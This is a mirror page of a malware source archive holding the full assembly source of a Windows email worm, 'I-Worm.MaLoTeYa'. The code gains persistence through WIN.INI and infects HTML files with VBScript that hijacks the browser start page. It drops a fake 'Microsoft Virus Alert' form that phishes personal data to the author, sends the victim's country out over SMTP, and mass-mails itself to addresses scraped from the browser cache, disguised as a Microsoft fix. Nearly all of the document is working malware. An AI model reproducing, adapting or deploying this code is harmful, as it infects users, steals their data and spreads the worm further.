Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
464e532a4b
vxug-MalwareSourceCode/Win32/I-Worm.MaLoTeYa.asm
vxunderground 4528c5fb12
Add files via upload
2020-10-09 22:25:52 -05:00

755 lines
16 KiB
NASM
Raw Blame History

comment #
Name : I-Worm.MaLoTeYa
Author : PetiK
Date : July 2nd - July 6th
Size : 12288 byte
Action: It copies itself to \WINDOWS\RUNW32.EXE and to \WINDOWS\SYSTEM\MSVA.EXE. It alters the
run= line and creates the VARegistered.htm file in the StartUp folder. This file send some
informations to petik@multimania.com and displays a fake message.
If the version of the platform is Windows 95/98, the file is a service process.
It infects all *.htm and *.html file while writing at the end a VB script. It checks after
if exist a internet connection and scans all *.htm* files in the "Temporary Internet Files"
to find some EMail addreses and send a copy of itself. The worms sends equally an email to
"petik@multimania.com" with the country of the user. When the user want to see the
system properties, the title of the window is changed by "PetiK always is with you :-)".
Greets to Benny, ZeMacroKiller98, Mandragore.
tasm32 /M /ML Maloteya
tlink32 -Tpe -aa -x Maloteya,,,import32
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
;----------------------------------------
;Installation of the worm in the computer
;----------------------------------------
DEBUT:
VERIF: push 00h
callx GetModuleFileNameA
push 50h
push offset szOrig
push eax
callx GetModuleFileNameA
push 50h
push offset szCopie
callx GetWindowsDirectoryA
@pushsz "\RUNW32.EXE"
push offset szCopie
callx lstrcat
push 50h
push offset szCopb
callx GetSystemDirectoryA
@pushsz "\MSVA.EXE"
push offset szCopb
callx lstrcat
push offset szOrig
push offset szCopie
callx lstrcmp
test eax,eax
jz CACHE
COPIE: push 00h
push offset szCopie
push offset szOrig
callx CopyFileA
push 00h
push offset szCopb
push offset szOrig
callx CopyFileA
WININI: push 50
push offset szWinini
callx GetWindowsDirectoryA
@pushsz "\\WIN.INI"
push offset szWinini
callx lstrcat
push offset szWinini
push offset szCopie
@pushsz "run"
@pushsz "windows"
callx WritePrivateProfileStringA
;--------------------------------------------------
;Create VARegistered.htm file in the StartUp folder
;--------------------------------------------------
C_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 07h ; STARTUP Folder
push offset StartUp
push 00h
call [getfolder]
test eax,eax
je F_HTM
@pushsz "\VARegistered.htm"
push offset StartUp
callx lstrcat
HTM: push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
push offset StartUp
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push HTMTAILLE
push offset htmd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
F_HTM: push [SHELLhdl]
callx FreeLibrary
F_MESS: push 1000
callx Sleep
push 1040h
@pushsz "Microsoft Virus Alert"
@pushsz "Your system does not appear infected with I-Worm.Magistr"
push 00h
callx MessageBoxA
jmp FIN
;----------------------------------
;Serivice process for Windows 95/98
;----------------------------------
CACHE: @pushsz "KERNEL32.dll"
callx GetModuleHandleA
@pushsz "RegisterServiceProcess"
push eax
callx GetProcAddress
xchg ecx,eax
jecxz D_INF
push 01h
push 00h
call ecx
D_INF: push 50
push offset szCurrent
callx GetCurrentDirectoryA
push offset szCurrent
callx SetCurrentDirectoryA
;---------------------------------------------
;Infect all *.htm* files of the Windows folder
;---------------------------------------------
FFF: push offset Search
@pushsz "*.htm*" ; Search some *.htm* files...
callx FindFirstFileA
inc eax
je F_INF
dec eax
mov [htmlHdl],eax
i_file: call infect ; and infect them
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
F_INF:
;-----------------------
; Check if we r conected
;-----------------------
NET1: @pushsz "WININET.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov WNEThdl,eax
@pushsz "InternetGetConnectedState"
push WNEThdl
callx GetProcAddress
test eax,eax
jz FIN
mov netcheck,eax
jmp NET2
NET2: push 00h
push offset Temp
call [netcheck] ; Connect to Internet ??
dec eax
jnz NET2
FINNET: push [WNEThdl]
callx FreeLibrary
PAYS: push 50
push offset szSystemini
callx GetWindowsDirectoryA
@pushsz "\Win.ini"
push offset szSystemini
callx lstrcat
push offset szSystemini
push 20
push offset org_pays
push offset Default
@pushsz "sCountry"
@pushsz "intl"
callx GetPrivateProfileStringA
;------------------------------------------------------------------
; Send the name of country to "petik@multomania.com" (perhaps bugs)
;------------------------------------------------------------------
SMTP: push offset WSA_Data ; Winsock
push 0101h ; ver 1.1 (W95+)
callx WSAStartup
or eax,eax
jnz INIT
@pushsz "obelisk.mpt.com.uk"
callx gethostbyname ; convert SMTP Name to an IP address
xchg ecx,eax
jecxz FREE_WIN ; Error ?
mov esi,[ecx+12] ; Fetch IP address
lodsd
push eax
pop [ServIP]
push 00h ; Create Socket
push 01h ; SOCK_STREAM
push 02h ; AF_INET
callx socket
mov work_socket,eax
inc eax
jz FREE_WIN
push 16 ; Sze of connect strucure
call @1 ; Connect structure
dw 2 ; Family
db 0, 25 ; Port number
ServIP dd 0 ; IP of server
db 8 dup(0) ; Unused
@1:
push [work_socket]
callx connect
inc eax
jz CLOSE_SOC
lea esi,Send_M
mov bl,6
Command_Loop: xor eax,eax
call @2 ; Time-out:
Time_Out: dd 5 ; Seconds
dd 0 ; Milliseconds
@2:
push eax ; Not used (Error)
push eax ; Not used (Writeability)
call @3
Socket_Set: dd 1 ; Socket count
work_socket dd 0 ; Socket
@3:
push eax ; Unused
callx select
dec eax
jnz CLOSE_SOC
push 00h
push 512 ; Received data from socket
push offset buf_recv
push [work_socket]
callx recv
xchg ecx,eax ; Connection closed ?
jecxz CLOSE_SOC
inc ecx ; Error ?
jz CLOSE_SOC
or ebx,ebx ; Received stuff was QUIT
jz CLOSE_SOC ; reply ? then close up.
mov al,'2' ; "OK" reply
cmp bl,2 ; Received stuff was the DATA
jne Check_Reply ; reply ?
inc eax
Check_Reply: scasb
je Wait_Ready
lea esi,Send_M + (5*4)
mov bl,1
Wait_Ready:
xor ecx,ecx
lea eax,Time_Out
push eax
push ecx ; not used (Error)
lea eax,Socket_Set
push eax ; Writeability
push ecx ; Not used (Readability)
push ecx ; Unused
callx select
dec eax ; Time-ouit ??
jnz CLOSE_SOC
cld
lodsd
movzx ecx,ax
shr eax,16
add eax,ebp
push ecx ; Send command and data to the socket
push 00h
push ecx ; Size of buffer
push eax ; Buffer
push [work_socket]
callx send
pop ecx
cmp eax,ecx
jne CLOSE_SOC
dec ebx
jns Command_Loop
CLOSE_SOC:
push [work_socket]
callx closesocket
FREE_WIN:
callx WSACleanup
INIT: @pushsz "MAPI32.dll"
callx LoadLibraryA
test eax,eax
jz FIN
mov MAPIhdl,eax
@pushsz "MAPISendMail"
push MAPIhdl
callx GetProcAddress
test eax,eax
jz FIN
mov sendmail,eax
D_GET: @pushsz "SHELL32.dll"
callx LoadLibraryA
mov SHELLhdl,eax
@pushsz "SHGetSpecialFolderPathA"
push SHELLhdl
callx GetProcAddress
mov getfolder,eax
push 00h
push 20h ; MSIE Cache Folder
push offset Cache
push 00h
call [getfolder]
push [SHELLhdl]
callx FreeLibrary
push offset Cache
callx SetCurrentDirectoryA
;-----------------------------------------------------------
; Search email addresses into the "Temporary Internet Files"
;-----------------------------------------------------------
FFF2: push offset Search
@pushsz "*.htm*"
callx FindFirstFileA
inc eax
je END_SPREAD
dec eax
mov [htmlHdl],eax
i_htm: call infect2
push offset Search
push [htmlHdl]
callx FindNextFileA
test eax,eax
jne i_file
push [htmlHdl]
callx FindClose
END_SPREAD:
push [MAPIhdl]
callx FreeLibrary
;---------------------------------------------------------------
; Changes the title of the System Properties window on Wednesday
;---------------------------------------------------------------
DATE: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],3
jne FIN
WIN1: @pushsz "Propri<72>t<EFBFBD>s Syst<73>me"
push 00h
callx FindWindowA
test eax,eax
jz WIN2
jmp WIN3
WIN2: @pushsz "System Properties" ; Change title some windows
push 00h
callx FindWindowA
test eax,eax
jz WIN1
WIN3: mov edi,eax
@pushsz "PetiK always is with you :-)"
push edi
callx SetWindowTextA
jmp WIN1
FIN: push 00h
callx ExitProcess
infect: pushad
mov esi,offset Search.cFileName
push esi
callx GetFileAttributesA
cmp eax,1
je end_infect
push 00h
push 80h
push 03h
push 00h
push 01h
push 40000000h
push esi
callx CreateFileA
xchg eax,edi
inc edi
je end_infect
dec edi
push 02h ; FILE_END
push 00h
push [Dist]
push edi
callx SetFilePointer
push 00h
push offset octets
push HTMSIZE
push offset d_htm
push edi
callx WriteFile
push edi
callx CloseHandle
push 01h ; READONLY
push esi
callx SetFileAttributesA
end_infect: popad
ret
infect2:pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset Search.cFileName
inc eax
je END_SPREAD
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 02h ; PAGE_READONLY
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 04h ; FILE_MAP_READ
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 00h
push ebx
callx GetFileSize
xchg eax,ecx
jecxz F3
d_scan_mail:
call @melto
db 'mailto:'
@melto: pop edi
scn_mail:
pushad
push 07h
pop ecx
rep cmpsb
popad
je scan_mail
inc esi
loop scn_mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
popad
ret
scan_mail:
xor edx,edx
add esi,7 ; size of the string "mailto:"
mov edi,offset m_addr
push edi
p_car: lodsb ; next character
cmp al,' ' ; space ??
je car_s
cmp al,'"' ; end character ??
je car_f
cmp al,'''' ; end character ??
je car_f
cmp al,'@' ; @ character ??
jne not_a
inc edx
not_a: stosb
jmp p_car ; jmp to nxt char
car_s: inc esi
jmp p_car
car_f: xor al,al
stosb
pop edi
test edx,edx ; exist @ ??
je d_scan_mail
call ENVOIE
jmp d_scan_mail
ENVOIE: xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIh]
call [sendmail]
ret
.data
namer db 50 dup (0)
szCopb db 50 dup (0)
szCopie db 50 dup (0)
szCurrent db 50 dup (0)
szOrig db 50 dup (0)
szSystemini db 50 dup (0)
szWinini db 50 dup (0)
Cache db 70 dup (0)
StartUp db 70 dup (0)
m_addr db 128 dup (?)
WSA_Data db 400 dup (0)
buf_recv db 512 dup (0)
Default db 0
FileHdl dd ?
octets dd ?
netcheck dd ?
sendmail dd ?
getfolder dd ?
htmlHdl dd ?
MAPIhdl dd ?
SHELLhdl dd ?
WNEThdl dd ?
RegHdl dd ?
Dist dd 0
Temp dd 0
MAPIh dd 0
WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h
Origine db "Made In France",00h
Message dd ?
dd offset sujet
dd offset corps
dd ?
dd offset date
dd ?
dd 2 ; MAPI_RECEIPT_REQUESTED ??
dd offset MsgFrom
dd 1 ; MAPI_UNREAD ??
dd offset MsgTo
dd 1
dd offset AttachDesc
MsgFrom dd ?
dd ?
dd offset NameFrom
dd offset MailFrom
dd ?
dd ?
MsgTo dd ?
dd 1 ; MAIL_TO
dd offset NameTo
dd offset m_addr
dd ?
dd ?
AttachDesc dd ?
dd ?
dd ? ; character in text to be replaced by attachment
dd offset szCopb ; Full path name of attachment file
dd ?
dd ?
sujet db "New Virus Alert !!",00h
corps db "This is a fix against I-Worm.Magistr.",0dh,0ah
db "Run the attached file (MSVA.EXE) to detect, repair and "
db "protect you against this malicious worm.",00h
date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM
NameFrom db "Microsoft Virus Alert"
MailFrom db "virus_alert@microsoft.com",00h
NameTo db "Customer",00h
Send_M: dw fHELO-dHELO
dw fFROM-dFROM
dw fRCPT-dRCPT
dw fDATA-dDATA
dw fMAIL-dMAIL
dw fQUIT-dQUIT
dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah
fHELO:
dFROM db 'MAIL FROM:<maloteya@petik.com>',0dh,0ah
fFROM:
dRCPT db 'RCPT TO:<petik@multimania.com>',0dh,0ah
fRCPT:
dDATA db 'DATA',0dh,0ah
fDATA:
dMAIL: db 'From: "MaLoTeYa",<maloteya@petik.com>',0dh,0ah
db 'Subject: Long Live the Worm',0dh,0ah
db 'Pays d''origine : '
org_pays db 20 dup (0)
db '',0dh,0ah
db '.',0dh,0ah
fMAIL:
dQUIT db 'QUIT',0dh,0ah
fQUIT:
htmd: db "<html><head><title>Virus Alert Registration</title></head>",0dh,0ah
db "<SCRIPT LANGUAGE=""VBScript"">",0dh,0ah
db "Sub control",0dh,0ah
db "dim i",0dh,0ah
db "dim caract",0dh,0ah
db "formu.action=""""",0dh,0ah
db "If formu.mail.value="""" Then",0dh,0ah
db " MsgBox ""Forgotten EMail""",0dh,0ah
db " Else",0dh,0ah
db " For i= 1 to len(formu.mail.value)",0dh,0ah
db " caract=mid(formu.mail.value,i,1)",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " Exit For",0dh,0ah
db " End If",0dh,0ah
db " Next",0dh,0ah
db " If caract=""@"" Then",0dh,0ah
db " formu.action=""mailto:petik@multimania.com""",0dh,0ah
db " Else",0dh,0ah
db " MsgBox ""Invalid EMail""",0dh,0ah
db " End If",0dh,0ah
db "End If",0dh,0ah
db "End Sub",0dh,0ah
db "</SCRIPT>",0dh,0ah
db "<body bgcolor=white text=black>",0dh,0ah
db "<p align=""center""><font size=""5"">Microsoft Virus Alert Registration</font></p>",0dh,0ah
db "<p align=""left""><font size=""3"">Please fill out this form. </font>",0dh,0ah
db "<font>You must be connected to internet.</font></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<form name=""formu"" action method=""POST"" enctype=""text/plan"">",0dh,0ah
db "<p>Name : <input name=""nom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Firstname : <input name=""prenom"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>City : <input name=""ville"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>Country : <input name=""pays"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p>E-Mail : <input name=""mail"" type=""TEXT"" size=""40""></p>",0dh,0ah
db "<p><input type=""submit"" value=""Submit"" name=""B1"" onclick=""control""></p>",0dh,0ah
db "<p></p>",0dh,0ah
db "<p align=""center""><font><B>AFTER REGISTRATION YOU CAN DELETE THIS FILE</B></font></p>",0dh,0ah
db "</form></body></html>",00h
HTMTAILLE equ $-htmd
d_htm: db "",0dh,0ah,0dh,0ah
db "<SCRIPT Language=VBScript>",0dh,0ah
db "On Error Resume Next",0dh,0ah
db "Set fso=CreateObject(""Scripting.FileSystemObject"")",0dh,0ah
db "Set ws=CreateObject(""WScript.Shell"")",0dh,0ah
db "ws.RegWrite ""HKCU\Software\Microsoft\Internet Explorer\Main\Start Page"",""http://www.petikvx.fr.fm""",0dh,0ah
db "document.Write ""<font face='verdana' color=red size='2'>This file is infected by my new virus"
db "<br>Written by PetiK (c)2001"
db "<br>HTML/W32.MaLoTeYa.Worm<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
HTMSIZE equ $-d_htm
OSVERSIONINFO struct
dwOSVersionInfoSize dd ?
dwMajorVersion dd ?
dwMinorVersion dd ?
dwBuildNumber dd ?
dwPlatformId dd ?
szCSDVersion db 128 dup (?)
OSVERSIONINFO ends
SYSTIME struct
wYear WORD ?
wMonth WORD ?
wDayOfWeek WORD ?
wDay WORD ?
wHour WORD ?
wMinute WORD ?
wSecond WORD ?
wMillisecond WORD ?
SYSTIME ends
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
OSVer OSVERSIONINFO <>
SystemTime SYSTIME <>
Search WIN32_FIND_DATA <>
end DEBUT
end
View Git Blame Copy Permalink